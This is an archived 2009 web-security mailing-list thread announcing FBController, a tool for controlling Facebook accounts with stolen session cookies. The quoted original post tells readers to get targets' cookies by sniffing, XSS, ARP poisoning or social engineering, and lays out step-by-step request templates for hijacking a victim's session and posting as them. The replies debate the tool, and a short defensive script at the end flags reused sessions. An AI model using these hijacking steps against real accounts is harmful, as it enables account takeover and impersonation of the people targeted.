List:       websecurity
Subject:    RE: [WEB SECURITY] FBController - (Facebook Control Utility) version 1.0
From:       QUAKER DOOMER <quakerdoomer () inbox ! lv>
Date:       2009-05-01 5:36:20
Message-ID: 1241156180.49fa8a544b8db () mail ! inbox ! lv

Dear Arshan,

I really appreciate your suggestions about the secure autoupdate feature. Thanks for 
that.

Also,

1 > FBController Project DOES NOT aim to transmogrify into a Facebook botnet 
Controller.

2 > I don't see anything to regret about FBController or any other application being an 
exe.
There are many software products like MS Windows, MS Office, Opera, OpenDocument 
format, Adobe Flash Player, Skype, etc. which we blindly trust and use without 
questioning or cross checking for backdoor instances. 
(Just because they are under established banners, but in the end still written by 
human beings. Programmers on monthly salaries !).

Most of my TooLs are executable binaries. I am now working on winAUTOPWN for 
FreeBSD (again FreeBSD ELF binaries, both 32 and amd64, which WON'T [easily] 
run on Linux .. Can be checked with brandelf)

3 > I don't backdoor my releases ! 
Also it's unwise to provide the real identity along with publicly releasing a Trojan. I 
don't want you to blindly trust FBController. Please run FBController under a Virtual 
Machine to check if still unsure.

4 > Yesterday Facebook stopped using the ABT= variable. I need to confirm this with 
a few more Facebook cookie sniffing users.
This further strengthens my determination for version 2 but not at the cost of 
winAUTOPWN suffering. 

Let me know :-)

Regards,
QD

Quoting Arshan Dabirsiaghi <arshan.dabirsiaghi@aspectsecurity.com>:
> I can kind of see the point if you're looking to control a physically
> unmanageable number of accounts simultaneously, like a Facebook botnet.
>  
> However, I think you (QUAKER DOOMER) will regret two things about this
> tool you've written:
>  
> 1) You released it as an .exe so pretty much no one will download it.
> Maybe a bored binary analysis type will just to see if and how you've
> trojaned it.
> 2) The moment Facebook makes some minor change to their workflow your
> tool becomes instantly useless. Next time, try some browser recording
> mechanism (like Selenium + Ruby output) and have the tool use a simple,
> secure auto-update feature to adapt to workflow changes in an agile way.
>  
> Arshan
> 
> ________________________________
> 
> From: Chris Eng [mailto:ceng@Veracode.com]
> Sent: Thu 4/30/2009 4:59 PM
> To: QUAKER DOOMER; websecurity@webappsec.org
> Subject: RE: [WEB SECURITY] FBController - (Facebook Control Utility)
> version 1.0
> 
> 
> 
> Apologies if I'm overlooking something here, but if you have the victim's
> Facebook cookie, why wouldn't you simply use an HTTP proxy or Firefox
> plugin to inject the stolen cookie into a request for /home.php, and then
> let the web browser do the rest of the work calculating/updating all the
> tokens?
> 
> 
> 
> 
> > -----Original Message-----
> > From: QUAKER DOOMER [mailto:quakerdoomer@inbox.lv]
> > Sent: Thursday, April 30, 2009 4:32 PM
> > To: websecurity@webappsec.org
> > Subject: [WEB SECURITY] FBController - (Facebook Control Utility) version 1.0
> >
> > FBController - The Ultimate Utility to Control Facebook accounts without the
> > Password.
> >
> > Let me clear that this utility WON'T hack/crack Facebook accounts.
> > The utility will need biscuits/cookies instead of the password.
> >
> > Get the target's cookie by sniffing, XSS, social engineering, ARP Poison-Sniffing,
> > scroogle search, anyhow !
> > Once you have the cookies you can use FBController and have Full control over
> > the target's Facebook account.
> >
> > ==============================================================
> > Login to your Facebook account and sniff your cookie OR collect a few live
> > Facebook Biscuit/s of your Target/s.
> >
> > 1 ] Generate a OG 10 Digit Unix Timestamp. If possible not way back older
> > than FaceBook.COM's current SYSTIME.
> >
> >
> > 2 ] Send a GET Request to www.facebook.com port 80 after calculating the
> > required variables (below)
> > [code]
> > GET /home.php? HTTP/1.1
> > Cookie: datr=(10-DIGIT-CURRENT-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-
> > BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-
> > PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA;
> > test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-
> > BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D;
> > cvr_tx=(OG-TIME-STAMP+63-TOTAL-SHOULD-BE-10-DIGIT-NEWTIMESTAMP)859;
> > login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid
> > %40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb
> > %3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES);
> > c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); made_write_conn=(OG-TIME-
> > STAMP+64-10-DIGIT-NEW-STAMP); cur_max_lag=3; h_user=(12-HEX-STRING-
> > FOREVER-FIXED-FOR-YOUR-ID); locale=en_US
> > [/code]
> >
> >
> > 3 ] From the Response Obtained :
> > Gain the variable nctr[nid]. For now keep nctr[id] same as nctr[nid].
> >
> > Calculating the new nctr[ct] :
> > Add +79 to Original Timestamp. Append 3 more digits to its end.
> >
> > Calculating &oldest= :
> > Deduct 144556 from Original Timestamp.
> >
> > Calculating composer_id :
> > Search for
> > UIComposer_STATE_PIC_OUTSIDE\" id=\"
> > This will be your composer_id at the later stage in the Status Update Page /
> > Other Post Request
> >
> > Calculating post_form_id
> > Search for
> > post_form_id:"
> > This will be your post_form_id at the later stage in the Status Update Page /
> > Other Post Request
> >
> > Calculating fb_dtsg
> > Right after post_form_id (explained just above this section) you can locate
> > fb_dtsg.
> > Else Search for
> > ,fb_dtsg:"
> > This will be your fb_dtsg at the later stage in the Status Update Page /
> > Other Post Request
> >
> > Your login_x actually looks like
> > a:2:{s:5:"email";s:13:"you@youremailprovider.com";s:19:"remember_me_default";
> > b:0;}
> > But keep it unchanged in the hex format.
> >
> >
> > 4 ] Send a GET Request like below with the above calculated variables :
> > [code]
> > GET /ajax/intent.php?hidden_count=5&oldest=(10-DIGIT-NEWLY-
> > CALCULATED)&delay_load_count=15&request_type=none&nctr[id]=(32-HEX-
> > STRING-OBTAINED-FROM-home.php-)&nctr[nid]=(32-HEX-STRING-OBTAINED-
> > FROM-home.php-)&nctr[ct]=(NEWLY-CALCULATED-10-DIGIT-TIMESTAMP)750
> > HTTP/1.1
> > Accept: */*
> > Accept-Language: en-US
> > XXXXXXX: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> > x-svn-rev: 161013
> > UA-CPU: x86
> > XXXXXXXXXXXXXXX: XXXXXXXXXXXXX
> > User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
> > Host: www.facebook.com
> > Connection: Keep-Alive
> > Cookie: datr=(10-DIGIT-CURRENt-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-
> > BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-
> > PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA;
> > test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-
> > BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D;
> > login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid
> > %40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb
> > %3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES);
> > c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); made_write_conn=(OG-TIME-
> > STAMP+64-10-DIGIT-NEW-STAMP); cur_max_lag=3; h_user=(12-HEX-STRING-
> > FOREVER-FIXED-FOR-YOUR-ID); locale=en_US; x-referer=http%3A%2F
> > %2Fwww.facebook.com%2Fhome.php
> > [/code]
> >
> > 5 ] In the output :
> > Search for Env[\"nctrlid\"]=\"
> > This is the NEW TRUE nctr[id]= for the Status Update POST Request :-)
> >
> >
> > 6 ] Generate a new POST Request with the above calculated new variables :
> > [code]
> > POST /updatestatus.php HTTP/1.1
> > Accept: */*
> > Accept-Language: en-US
> > XXXXXXX: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> > x-svn-rev: 161013
> > Content-Type: application/x-www-form-urlencoded
> > UA-CPU: x86
> > XXXXXXXXXXXXXXX: XXXXXXXXXXXXX
> > User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
> > Host: www.facebook.com
> > Content-Length: 343
> > Connection: Keep-Alive
> > Cache-Control: no-cache
> > Cookie: datr=(10-DIGIT-CURRENt-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-
> > BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-
> > PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA;
> > test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-
> > BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D;
> > login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid
> > %40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb
> > %3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES);
> > c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); cur_max_lag=3; h_user=(12-
> > HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US; x-referer=http%3A
> > %2F%2Fwww.facebook.com%2Fhome.php
> >
> > action=HOME_UPDATE&home_tab_id=1&profile_id=(YOUR-10-DIGIT-PROFILE-
> > ID)&status=TYPE-THE-STATUS-HERE&target_id=0&&composer_id=(24-HEX-
> > STRING-OBTAINED-FROM-home.php-RESPONSE))&post_form_id=(32-HEX-STRING-
> > FROM-home.php-RESPONSE)&fb_dtsg=(27-HEX-STRING-)-FROM-home.php-
> > RESPONSE&post_form_id_source=AsyncRequest&nctr[id]=(32-HEX-STRING-
> > CALCULATED-AS-EXPLAINED-IN-POINT-5)&nctr[nid]=(32-HEX-STRING-OBTAINED-
> > FROM-home.php-RESPONSE)&nctr[ct]=(10-DIGIT-CALCULATED-TIMESTAMP-AS-
> > EXPLAINED-In-POINT-3)375
> > [/code]
> >
> >
> > 7 ] Use the above variables to view any content with the appropriate GET /
> > requests
> >
> >
> > 8 ] For POST-ing making changes, GOTO 2 ] and REDO :-)
> >
> >
> > Looks like loads of HardWork ha ?
> > If you don't want to do all this manually, then you can download this TooL
> > named FBController (FACEBOOK CONTROLLER) written by me.
> > Till now FBController version 1.0 uses your Target's provided cookie and only :
> >
> > A > Downloads the HomePage.
> > B > Allows you to Update the Target's Wall and
> > C > Retrieve your Target's Friend's List
> >
> > There are many APIs available to write apps and 3rd party Tools for FB in
> > Java, Perl, .NET, etc.
> >
> > FBConTroller was entirely written without knowing any of Facebook's Dev
> > API's.
> > Considering the above along with Facebook's complexity, the next version might
> > take some time to get released
> >
> > Many more features to come in version 2.0
> >
> > A 26th April Release !
> > Research duration some 33 hours - Sunday Evening 26th April 2009 -to- 29th
> > April 2009.
> >
> > Happy Controlling ! :-)
> > ==============================================================
> >
> > Download :
> > http://my.opera.com/quakerdoomer/blog/2009/04/30/fbcontroller-facebook-controller-the-ultimate-facebook-controller-without-the-pa
> >
> > The Latest available release is FBCONTROLLER version 1.0
> > Coded by : Azim Poonawala (QUAKERDOOMER)
> > Author's website : http://solidmecca.co.nr
> >
> > Regards,
> > QUAKERDOOMER
> >
> >
> >
> > ----------------------------------------------------------------------------
> > Join us on IRC: irc.freenode.net #webappsec
> >
> > Have a question? Search The Web Security Mailing List Archives:
> > http://www.webappsec.org/lists/websecurity/archive/
> >
> > Subscribe via RSS:
> > http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
> >
> > Join WASC on LinkedIn
> > http://www.linkedin.com/e/gis/83336/4B20E4374DBA
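
The thread's premise is that a captured session cookie alone lets a second client act as the account. Seen from the server side, that shows up as one session identifier arriving from two different client fingerprints close together in time; the sketch below is an added example, not part of any message in this thread, and its log format, the `sess=` field name and the 30-minute window are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample lines in an assumed format: time, client IP, session id, User-Agent.
SAMPLE_LOG = '''\
2009-05-01T05:00:00 192.0.2.10 sess=c3d4 "Opera/9.64 (Windows NT 5.1)"
2009-05-01T05:30:00 198.51.100.7 sess=a1b2 "Mozilla/5.0 (X11; Linux) Firefox/3.0"
2009-05-01T05:31:10 198.51.100.7 sess=a1b2 "Mozilla/5.0 (X11; Linux) Firefox/3.0"
2009-05-01T05:36:20 203.0.113.9 sess=a1b2 "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
2009-05-01T05:37:00 198.51.100.7 sess=a1b2 "Mozilla/5.0 (X11; Linux) Firefox/3.0"
this line is malformed and is skipped
2009-05-01T08:10:00 192.0.2.77 sess=c3d4 "Opera/9.64 (Windows NT 5.1)"
'''

LINE_RE = re.compile(r'^(\S+) (\S+) sess=(\S+) "([^"]*)"$')
WINDOW = timedelta(minutes=30)  # assumed threshold; tune to real traffic


def parse(log_text):
    """Yield (timestamp, ip, session_id, user_agent); malformed lines are skipped."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts, ip, sid, ua = m.groups()
            yield datetime.fromisoformat(ts), ip, sid, ua


def find_replayed_sessions(log_text, window=WINDOW):
    """Map session id -> client fingerprints (ip, ua) that used it within `window` of each other."""
    seen = {}     # sid -> {(ip, ua): last time this fingerprint used the session}
    flagged = {}  # sid -> fingerprints involved, in order of first appearance
    for ts, ip, sid, ua in sorted(parse(log_text)):
        clients = seen.setdefault(sid, {})
        fp = (ip, ua)
        # Another fingerprint used this same session recently: likely cookie replay.
        overlap = [o for o, t in clients.items() if o != fp and ts - t <= window]
        if overlap:
            hits = flagged.setdefault(sid, [])
            for f in overlap + [fp]:
                if f not in hits:
                    hits.append(f)
        clients[fp] = ts
    return flagged


if __name__ == "__main__":
    for sid, clients in find_replayed_sessions(SAMPLE_LOG).items():
        print(sid, clients)
```

Session `c3d4` changes address three hours apart and is not flagged, while `a1b2` is used by two clients within minutes and is.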

